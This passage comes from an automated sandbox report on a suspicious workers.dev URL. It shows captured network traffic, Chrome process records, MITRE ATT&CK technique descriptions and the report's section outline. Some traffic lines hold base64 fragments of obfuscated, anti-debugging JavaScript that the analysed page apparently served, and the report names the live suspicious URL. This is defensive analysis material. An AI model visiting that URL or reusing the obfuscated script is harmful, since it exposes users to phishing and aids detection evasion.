2024-05-26 22:46:25 UTC	1369	IN	Data Raw: 69 68 75 4c 48 49 70 65 33 5a 68 63 69 42 30 50 57 55 2f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 70 5a 69 68 79 4b 58 74 32 59 58 49 67 64 44 31 79 4c 6d 46 77 63 47 78 35 4b 47 34 73 59 58 4a 6e 64 57 31 6c 62 6e 52 7a 4b 54 74 79 5a 58 52 31 63 6d 34 67 63 6a 31 75 64 57 78 73 4c 48 52 39 66 54 70 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 65 33 30 37 63 6d 56 30 64 58 4a 75 49 47 55 39 49 54 45 73 64 48 31 39 4b 43 6b 37 63 32 56 30 53 57 35 30 5a 58 4a 32 59 57 77 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 66 4d 48 67 30 4e 57 52 69 59 32 4d 6f 4b 58 30 73 4e 47 55 7a 4b 54 74 32 59 58 49 67 58 7a 42 34 4d 6d 4a 68 4d 7a 67 7a 50 56 38 77 65 44 46 6d 5a 6d 49 32 4d 79 68 30 61 47 6c 7a 4c 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6c 37 5a 6d 39 79 Data Ascii: ihuLHIpe3ZhciB0PWU/ZnVuY3Rpb24oKXtpZihyKXt2YXIgdD1yLmFwcGx5KG4sYXJndW1lbnRzKTtyZXR1cm4gcj1udWxsLHR9fTpmdW5jdGlvbigpe307cmV0dXJuIGU9ITEsdH19KCk7c2V0SW50ZXJ2YWwoZnVuY3Rpb24oKXtfMHg0NWRiY2MoKX0sNGUzKTt2YXIgXzB4MmJhMzgzPV8weDFmZmI2Myh0aGlzLGZ1bmN0aW9uKCl7Zm9y
2024-05-26 22:46:25 UTC	887	IN	Data Raw: 67 69 59 32 39 31 62 6e 52 6c 63 69 49 70 4f 7a 45 68 50 54 30 6f 49 69 49 72 64 43 39 30 4b 53 35 73 5a 57 35 6e 64 47 68 38 66 48 51 6c 4d 6a 41 39 50 54 41 2f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 79 5a 58 52 31 63 6d 34 68 4d 48 30 75 59 32 39 75 63 33 52 79 64 57 4e 30 62 33 49 6f 49 6d 52 6c 59 6e 56 6e 5a 32 56 79 49 69 6b 75 59 32 46 73 62 43 67 69 59 57 4e 30 61 57 39 75 49 69 6b 36 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 79 5a 58 52 31 63 6d 34 68 4d 58 30 75 59 32 39 75 63 33 52 79 64 57 4e 30 62 33 49 6f 49 6d 52 6c 59 6e 56 6e 5a 32 56 79 49 69 6b 75 59 58 42 77 62 48 6b 6f 49 6e 4e 30 59 58 52 6c 54 32 4a 71 5a 57 4e 30 49 69 6b 73 62 69 67 72 4b 33 51 70 66 58 52 79 65 58 74 70 5a 69 68 30 4b 58 4a 6c 64 48 56 79 62 69 42 75 4f Data Ascii: giY291bnRlciIpOzEhPT0oIiIrdC90KS5sZW5ndGh8fHQlMjA9PTA/ZnVuY3Rpb24oKXtyZXR1cm4hMH0uY29uc3RydWN0b3IoImRlYnVnZ2VyIikuY2FsbCgiYWN0aW9uIik6ZnVuY3Rpb24oKXtyZXR1cm4hMX0uY29uc3RydWN0b3IoImRlYnVnZ2VyIikuYXBwbHkoInN0YXRlT2JqZWN0IiksbigrK3QpfXRyeXtpZih0KXJldHVybiBuO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49715	23.211.8.90	443

Timestamp	Bytes transferred	Direction	Data
2024-05-26 22:46:25 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-26 22:46:25 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=235383 Date: Sun, 26 May 2024 22:46:25 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-26 22:46:25 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Target ID:	0
Start time:	18:46:12
Start date:	26/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	18:46:15
Start date:	26/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2256,i,9995143028480638242,2748133430163504411,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	18:46:19
Start date:	26/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://fanondiekoxzijds.jamesona8.workers.dev/"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://fanondiekoxzijds.jamesona8.workers.dev/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 44

Chrome Cache Entry: 45

Chrome Cache Entry: 46

Chrome Cache Entry: 47

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 6312, Parent PID: 5684

General

Chronological Activities

Analysis Process: chrome.exePID: 5904, Parent PID: 6312

General

Chronological Activities

Windows Analysis Report
https://fanondiekoxzijds.jamesona8.workers.dev/